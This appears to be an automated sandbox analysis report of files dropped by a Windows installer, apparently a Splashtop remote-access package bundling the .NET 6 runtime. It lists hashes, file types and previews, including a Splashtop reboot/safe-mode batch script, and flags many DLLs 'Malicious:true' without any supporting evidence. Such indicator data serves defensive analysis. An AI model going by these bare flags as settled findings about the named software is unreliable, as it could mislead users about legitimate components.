                                                                                                                                                                                                                                                                                                                                  SHA1:289BA87563ABA33D9385C04834745AF4F5BE1882
                                                                                                                                                                                                                                                                                                                                  SHA-256:66ECEBD3D11557D42AE33B64E522F371D6D27651B8B7350BEF41F691FAB1465E
                                                                                                                                                                                                                                                                                                                                  SHA-512:F5376FE1195A14DCC4F1265F61088EF0452C72DCF17F0B7AA4ED4DB903347C60C9557E556DEAF0244DB0A5F3EA8B7065D7D66BD1638D1EC566EE26110854D5E1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):341512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.896157399444813
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:M9tl9yREhb42jcvlftvY5RL2vu2K2KTYJ1EbH18sggSNOCZ174h5o1YL6yTlNhRY:M9tcu4Jlft1223K61EjNSNOWih5y38lu
                                                                                                                                                                                                                                                                                                                                  MD5:99A6A9656DA926AF8AA648D50B47DCFB
                                                                                                                                                                                                                                                                                                                                  SHA1:81DB96003BD8F63250ABC7E59FB35E0227D3F28A
                                                                                                                                                                                                                                                                                                                                  SHA-256:FDF1F9D0AF4FF8E5CBD4387D6849327E91F0EEDD1BEFE58D7DD8B6EC40E90A98
                                                                                                                                                                                                                                                                                                                                  SHA-512:16E850FDABF76A11ED4176E0FD57DAFB64FAF9551EA220D003C5A86AFF8C39AB40D66F7AC7FCC6EF71CFA7E1D6268BBC23E32AA5CF69DF58A5D05F666701F3C0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1080328
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.546186990732032
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:999IeBE76bZaCUrF0XbuqIpInZVrUCzfk44dh:99S+EAZeY/Uf3
                                                                                                                                                                                                                                                                                                                                  MD5:0AB2DFD4535874F87314F2C7A95F4A34
                                                                                                                                                                                                                                                                                                                                  SHA1:467BB012D7513E9F9C2C8EB50426944920D691BD
                                                                                                                                                                                                                                                                                                                                  SHA-256:79DC42EF1CA17CC8B887FD54D7CEE9AA73583CFFA070BAC4D7DF4736CD081B0E
                                                                                                                                                                                                                                                                                                                                  SHA-512:479CCE8963B38F51B105DE46F5AAF302D534944568B58FF37F6BA082D4BE7124CA9CABD774F7BF794D559CD887CFD46D5E36F8CF87BCCB6F1A0D0EA6C1DD5E4D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):6329352
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.474214666583154
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:196608:pgbAseL7BvFDZ31L+3/pcAEztjbnu7BegenubWEwBBF7QmQVmdYdlkSIWd:eIBFVImdYIc
                                                                                                                                                                                                                                                                                                                                  MD5:6C3A2BBB9B8333D5D6372BE4D1F7944B
                                                                                                                                                                                                                                                                                                                                  SHA1:134E410FF3FE258E21D4677F93D37894AAE9BD71
                                                                                                                                                                                                                                                                                                                                  SHA-256:24E1EF25FB545B2F0F965F2A731415F8064461A027BF024A0C0C86DA58ECA4CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:6F0F3999AF5328DE07636EB4938696D41ACDC7B33F1311D1870CA489C6D37EFA815621F7A24923A16D694EB6608C6D546D2B78A4A76C6566232A3D995878982F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2005000
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.624661361303851
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:nwkv3AwJVKqoLU5WLSEA8DpT8BrpL3yZPvlOA:nwC3X2qAU5WLSfmpYBrpL3yVl/
                                                                                                                                                                                                                                                                                                                                  MD5:8304B98246741166A6EF6D7329991A3D
                                                                                                                                                                                                                                                                                                                                  SHA1:CC3E09813A11F93985C1CBDC43757E035B8D107A
                                                                                                                                                                                                                                                                                                                                  SHA-256:756B883BFA6A373DE6EC9AF2F92384468EBA12E94E30798A48D65A85978D8353
                                                                                                                                                                                                                                                                                                                                  SHA-512:8702288AB9E1372DEA83E8B020705FCE6D90C4BC8DC8D3D5424094EA7195B6B8772772A9E48D81D92F4BA0C3E3D23747E664456B2299E8CB2B230B06D4A1235E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1983496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.629362747301788
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:Oynw6ObGqDwP4zGSfKzEgro2SK/el4JzLeBIml:OewhN1z1fKzEg82SwA4JzLeBI2
                                                                                                                                                                                                                                                                                                                                  MD5:41410EEFF7D20884559976BE498402B7
                                                                                                                                                                                                                                                                                                                                  SHA1:2CB4ED924DDEBCFB3BBD09831EA7B76BDB3930C6
                                                                                                                                                                                                                                                                                                                                  SHA-256:7BA63A8B9BD4312A3CDC382E4D62AD607D932856AC1175CC83C0018C464B0C1F
                                                                                                                                                                                                                                                                                                                                  SHA-512:9E4EA26E607C2F6F77254D0CAB89CE30FB7622224DC4A079A66A42E7AE336E8AEE7FE0F1AB91E9ECE4301D1268002A858E42DECB583C6D2283BE69562F25CBB3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2106376
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.630783533239102
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:dNR7upmCYggootznExWoXujFqZzuu4rmqNf5tY/0:pqgzTooFnEAoXuQZCu4rmqNf5+M
                                                                                                                                                                                                                                                                                                                                  MD5:4917B37A2B9A58E53E536FA5FB234113
                                                                                                                                                                                                                                                                                                                                  SHA1:FD93BA18831B68B75DE0210EE49FC1D060CE4306
                                                                                                                                                                                                                                                                                                                                  SHA-256:91B7619E1C0536F076C267AB293BA84FE01EB38289F80D27F158AE4067BFDA3F
                                                                                                                                                                                                                                                                                                                                  SHA-512:8E397E3EDAAEF66E6238D41782BA0D30EFEE62463C5A08D72C98837C7C37575ACB3E1BF0BE6CE917435D607271C89D8E443FB695DB30CE4DDC475E6DCB40D365
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2350600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.687007419216864
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:9eZbYf0fPErcZWPGA3X+WzVZsovvrtNEtj3+5u5D5K0sFTjEugVKN:9eh2uPI3Pb3XBzrs8v5N0D+5uZ5K0sxt
                                                                                                                                                                                                                                                                                                                                  MD5:53DF1EAFB05484820C02336E69C2FEE7
                                                                                                                                                                                                                                                                                                                                  SHA1:11F1C0900A90AE1160FE4E48089C91C3DF3ED82F
                                                                                                                                                                                                                                                                                                                                  SHA-256:9F99F829A4CF29858BCF4B2182CAD8682A65DA3060C4127D1D311C4628214234
                                                                                                                                                                                                                                                                                                                                  SHA-512:357286BD9FDBCFC178C59D43A102E97133C38A9045E659B30546A25F6B261E2C04C61934191741741B459B81782618FC8344A27D9DEE71951A8BBFD6A95C05D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):108032
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.392406183079777
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:4DMkwASAlBbybU8rxkQz/g9pV9Z2dcvxp267OKiY+dp9oL:4oASAv9FYUp3OKiY+n9oL
                                                                                                                                                                                                                                                                                                                                  MD5:93601A93026211DE5CB00C3827883EEC
                                                                                                                                                                                                                                                                                                                                  SHA1:931CBC627272361425EFCAEE6362B041A3FF6E3B
                                                                                                                                                                                                                                                                                                                                  SHA-256:1959B8E79F5BC0AB7451F0F362A714572136503C864C974E1088B1951EE592A1
                                                                                                                                                                                                                                                                                                                                  SHA-512:53C5F46A1E1F188C429EE686F9CE7E0A8ED5B5BDFA51D8DD3B619B9FD61B8F6EDCC162BCBA667E6336CBED8056F0A17A614170C60059BDB2947770223D19FBC5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3221
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.297235243948338
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:3UoGnVsAdB/+8W3/VcCDO/wAKCRIpCBIweFC4+C/+CYFc:3UoGnVldBWtejp6tL
                                                                                                                                                                                                                                                                                                                                  MD5:ABE8E3568B6D951E7DD395DA46531932
                                                                                                                                                                                                                                                                                                                                  SHA1:304D81C1B48E16533EF691A9C965818136B9583C
                                                                                                                                                                                                                                                                                                                                  SHA-256:EB700422C31C15757A6C70141274A184D291AAC3BDE191A964F75A90BC084143
                                                                                                                                                                                                                                                                                                                                  SHA-512:19A79D90883103302BDDBAC8A765C6A5196FB78C223D911633285B4BA44EBFFA9C64690102498E3BEF5991DBA0F28847473A44D4F9AA7D637A4C4D3F1EFEA12E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@ECHO OFF..rem %1 - mode..set RMode=%1....IF NOT defined RMode (.. set RMode=1..)....echo RMode=%RMode%....IF %RMode% EQU 1 goto close_and_open..IF %RMode% EQU 2 goto normal_reboot..IF %RMode% EQU 3 goto reboot_to_safemode..IF %RMode% EQU 4 goto shutdown_byebye..IF %RMode% EQU 5 goto boot_to_normal..IF %RMode% EQU 6 goto boot_to_safemode..IF %RMode% EQU 7 goto normal_reboot_asrs....echo RMode=%RMode%....:close_and_open..net stop splashtopremoteservice & timeout /t 5 & net start splashtopremoteservice..GOTO end....:normal_reboot..SHUTDOWN -t 10 -r -f -c "Your Splashtop admin has issued a reboot."..GOTO end....:normal_reboot_asrs..SHUTDOWN -t 25 -r -f -c "Your Splashtop admin has issued a reboot."..GOTO end....:shutdown_byebye..shutdown -t 10 -s -f..GOTO end....:boot_to_normal..ver..ver | findstr /i "10\.0\.*\." > nul..IF %ERRORLEVEL% EQU 0 goto ver_nt6x_boot_normal..ver | findstr /i "5\.*\." > nul..IF %ERRORLEVEL% EQU 0 goto ver_nt5x_boot_normal..ver | findstr /i "6\.*\." > nul..IF %ER
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):194632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.700953544041196
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:CgElAKvMslbFN3XCm3dbSDcTn6iw5t4FEvQeXyB8LGeph+K:IFD3dmABw5SFEv/ypeqK
                                                                                                                                                                                                                                                                                                                                  MD5:4A2F597C15AD595CFD83F8A34A0AB07A
                                                                                                                                                                                                                                                                                                                                  SHA1:7F6481BE6DDD959ADDE53251FA7E9283A01F0962
                                                                                                                                                                                                                                                                                                                                  SHA-256:5E756F0F1164B7519D2269AA85E43B435B5C7B92E65ED84E6051E75502F31804
                                                                                                                                                                                                                                                                                                                                  SHA-512:0E868AD546A6081DE76B4A5CDCC7D457B2F0FB7239DC676C17C46A988A02696B12A9C3A85F627C76E6524F9A3ED25F2D9B8E8764D7E18FC708EAD4475591946F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (514), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9519
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.902271147017698
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ydP0KvBLCqikR/EgGJLrlwD+eilNi5Py1SDeoDXDw9lF5OMz6Q:PWBuqikR/EDJLriwlNi5KI1Tw9lF5OjQ
                                                                                                                                                                                                                                                                                                                                  MD5:31C5A77B3C57C8C2E82B9541B00BCD5A
                                                                                                                                                                                                                                                                                                                                  SHA1:153D4BC14E3A2C1485006F1752E797CA8684D06D
                                                                                                                                                                                                                                                                                                                                  SHA-256:7F6839A61CE892B79C6549E2DC5A81FDBD240A0B260F8881216B45B7FDA8B45D
                                                                                                                                                                                                                                                                                                                                  SHA-512:AD33E3C0C3B060AD44C5B1B712C991B2D7042F6A60DC691C014D977C922A7E3A783BA9BADE1A34DE853C271FDE1FB75BC2C47869ACD863A40BE3A6C6D754C0A6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MICROSOFT SOFTWARE LICENSE TERMS..MICROSOFT .NET LIBRARY ..These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. Please read them. They apply to the software named above, which includes the media on which you received it, if any. The terms also apply to any Microsoft.. * updates,.. * supplements,.. * Internet-based services, and.. * support services..for this software, unless other terms accompany those items. If so, those terms apply...BY USING THE SOFTWARE, YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM, DO NOT USE THE SOFTWARE...IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE PERPETUAL RIGHTS BELOW...1. INSTALLATION AND USE RIGHTS. .. a. Installation and Use. You may install and use any number of copies of the software to design, develop and test your programs... b. Third Party Programs. The software may include third party programs that Microsoft, not the third party, licenses to you under this
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (755), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):79954
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2343129347468
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:HA9jHwQZGfgg39/zwgAVkguQXrDjugtSEGepkWvrpX7anuqdLS4mfiStPq+3Lefj:HA97wfogz1AVxuujHtSFULryLggrGRwJ
                                                                                                                                                                                                                                                                                                                                  MD5:F77A4AECFAF4640D801EB6DCDFDDC478
                                                                                                                                                                                                                                                                                                                                  SHA1:7424710F255F6205EF559E4D7E281A3B701183BB
                                                                                                                                                                                                                                                                                                                                  SHA-256:D5DB0ED54363E40717AE09E746DEC99AD5B09223CC1273BB870703176DD226B7
                                                                                                                                                                                                                                                                                                                                  SHA-512:1B729DFA561899980BA8B15128EA39BC1E609FE07B30B283001FD9CF9DA62885D78C18082D0085EDD81F09203F878549B48F7F888A8486A2A526B134C849FD6B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.NET Runtime uses third-party libraries or other resources that may be..distributed under licenses different than the .NET Runtime software.....In the event that we accidentally failed to list a required notice, please..bring it to our attention. Post an issue or email us:.... dotnet@microsoft.com....The attached notices are provided for information only.....License notice for ASP.NET..-------------------------------....Copyright (c) .NET Foundation. All rights reserved...Licensed under the Apache License, Version 2.0.....Available at..https://github.com/dotnet/aspnetcore/blob/main/LICENSE.txt....License notice for Slicing-by-8..-------------------------------....http://sourceforge.net/projects/slicing-by-8/....Copyright (c) 2004-2006 Intel Corporation - All Rights Reserved......This software program is licensed subject to the BSD License, available at..http://www.opensource.org/licenses/bsd-license.html.....License notice for Unicode data..-------------------------------...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):139560
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.287749729909957
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:swmRQoZmiyYIRPEgufW6see/URLSpseL5AXboB0UD:swmRbZmiyAfClcRLSpfLyLu0g
                                                                                                                                                                                                                                                                                                                                  MD5:36D228BE5ED20ADCC78CE322462BB51F
                                                                                                                                                                                                                                                                                                                                  SHA1:075B139595D5A86D53F87E2C90F0E484C9A769C0
                                                                                                                                                                                                                                                                                                                                  SHA-256:9935A604779C42CC7FC4291A68EC1D6EE889B8CEC349630B1ED1EFEC0B79B1BE
                                                                                                                                                                                                                                                                                                                                  SHA-512:419744B62337B1DBAD22FC3D1238FE2CC2DD7CABFBAD79F14E05CE6C470189D8F0DA8E6C9C97AA6E86AFD8398BAA9B90DFDA0A295D61A2F7413A7ADC704B9A27
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):378016
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.299291222115666
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:oGrRuLv2A7NEtiODC3zGr4iAOsCSEAg2gcmgrW091s:vOv2aNEzDuiAOsUuH91s
                                                                                                                                                                                                                                                                                                                                  MD5:940CD13B0268A9F75DD1C04548BBB9A9
                                                                                                                                                                                                                                                                                                                                  SHA1:7EBCE93D389C04DF1E3FCE71C9659DF6D75749B5
                                                                                                                                                                                                                                                                                                                                  SHA-256:36D60BF2659400EA672EDEC58C7FA1105B8F7BF55E75A75C7554ECDEFF1DBD89
                                                                                                                                                                                                                                                                                                                                  SHA-512:37A9384067DA8F9FE345519455D1E9B125E8EB8B7B1E87F8B8DDFDB1070E5556B6A65084A32F56FDF9D4553A986F4575691859C71882445506650D947859B1B2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.951272380112911
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:ilQC7BRFSRHLgQbLi:w7BTiBbLi
                                                                                                                                                                                                                                                                                                                                  MD5:BB568E3396EAB3BC8E5B4084D3288C15
                                                                                                                                                                                                                                                                                                                                  SHA1:0C06BC1D72CF0706B7A901F4570A73E4CD151172
                                                                                                                                                                                                                                                                                                                                  SHA-256:B648A485B2762EA04CDCFB1C4631F0A75929D1ED8B7C1DF4BB139F0201662643
                                                                                                                                                                                                                                                                                                                                  SHA-512:42B379CB8596E258393948B5394FC5840DB3D9B76BEAAACD1BFBFE6C860C3835596BCBD4B31CDFF444A9AFEF46EE617BFD830AE46F08C974186A47DA2ED43272
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:b357f86ce3bce7c232ea242074b17bebdc50b543..6.0.35..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1042720
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.759185121370171
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:a93g4kD8aA+u1xjx1nu+Vu9yHZzsYghdi4YNLNlqx:W3g4kDiLlVu+Vu9yH+XiFi
                                                                                                                                                                                                                                                                                                                                  MD5:C3928A25CD29B21B84DF1554B4EA3FEE
                                                                                                                                                                                                                                                                                                                                  SHA1:057F67EB18BC2B19CB77AC413141DE255DBD0211
                                                                                                                                                                                                                                                                                                                                  SHA-256:79E9D346314609D493344EA0C51AE8E93DEAA5870A105FC07EB29E8458748CBE
                                                                                                                                                                                                                                                                                                                                  SHA-512:825FD54D970A7B02C7863C45B574CBF3D51B0CFA33B51681B8D96D5D32771A4EF24EBCE5C57AFF664AB7231279A60871C8967745F87A9698347E4A66E0DB3EAC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2309152
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.414576855139372
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:jH+fGgFyzuNiG6H0n8D1gkrz/OAyFAopdrq/c/:+GgFQq8DT/ZyFDN0c
                                                                                                                                                                                                                                                                                                                                  MD5:A71CD05C01F0FC603C0BD782516F806D
                                                                                                                                                                                                                                                                                                                                  SHA1:C15E261D5E7318875D324D28AB70A883CD434C81
                                                                                                                                                                                                                                                                                                                                  SHA-256:7F8DCF37D9D66EAE14C48A79FA2FCD447BD0F38A21BE0203A9C4A89398AACF28
                                                                                                                                                                                                                                                                                                                                  SHA-512:CE53F6DC1F02889ED6FB1F8DF226F9BADBB039F79505CDBD599A00A32B6617DA5E19F2AD7F76BB8134B3CCAD39FAB2209ED8EC6AE42CD30402C4E450FC19FA88
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32962
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.336195794839597
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:+BP5VEsIhKPMEPrT3XCGjDyiEc6BHa21Fe8kFN92uwtEeCJyK:6RVEsIhKPMEPrT3XCGjDyiEc6BHa21Fk
                                                                                                                                                                                                                                                                                                                                  MD5:4D015F352BB2E8413AC4215371BC5E35
                                                                                                                                                                                                                                                                                                                                  SHA1:ADFF306655001DCD02003372C2AC439A7BE17C59
                                                                                                                                                                                                                                                                                                                                  SHA-256:686481AE0DD4F3F7E44B2A4FA2949B319A0F701437CA42FDA78D637EBC2BD298
                                                                                                                                                                                                                                                                                                                                  SHA-512:DA871BA710634EF171A80ACD1A473BEB8204E8DF10F375CB999B9FF1A95264C256D5C7E01531F62E8D4A2608BBB858A7C6209DCBE2348E360C7F231861D3CF5C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v6.0/win-x64",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v6.0": {},.. ".NETCoreApp,Version=v6.0/win-x64": {.. "Microsoft.NETCore.App.Runtime.win-x64/6.0.35": {.. "runtime": {.. "System.Private.CoreLib.dll": {.. "assemblyVersion": "6.0.0.0",.. "fileVersion": "6.0.3524.45918".. },.. "Microsoft.VisualBasic.dll": {.. "assemblyVersion": "10.0.0.0",.. "fileVersion": "6.0.3524.45918".. },.. "mscorlib.dll": {.. "assemblyVersion": "4.0.0.0",.. "fileVersion": "6.0.3524.45918".. },.. "netstandard.dll": {.. "assemblyVersion": "2.1.0.0",.. "fileVersion": "6.0.3524.45918".. },.. "System.AppContext.dll": {.. "assemblyVersion": "6.0.0.0",.. "fileVersion": "6.0.3524.45918".. },..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):159
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.54941695087313
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:3Hpn/hdNxDI/pANC+KL4nNOcW3mJAGRM3Bojqy2VKXmHEk/FTy:3Hp/hdNyhAk+Q6NOCUo+K8EkNTy
                                                                                                                                                                                                                                                                                                                                  MD5:3FBD84A952D4BAB02E11FEC7B2BBC90E
                                                                                                                                                                                                                                                                                                                                  SHA1:E92DE794F3C8D5A5A1A0B75318BE9D5FB528D07D
                                                                                                                                                                                                                                                                                                                                  SHA-256:1B7AA545D9D3216979A9EFE8D72967F6E559A9C6A22288D14444D6C5C4C15738
                                                                                                                                                                                                                                                                                                                                  SHA-512:C97C1DA7AE94847D4EDF11625DC5B5085838C3842A550310CCA5C70BA54BE907FF454CA1E0080BA451EACFC5954C3F778F8B4E26C0933E55C121C86C9A24400B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:{.. "runtimeOptions": {.. "tfm": "net6.0",.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false.. }.. }..}
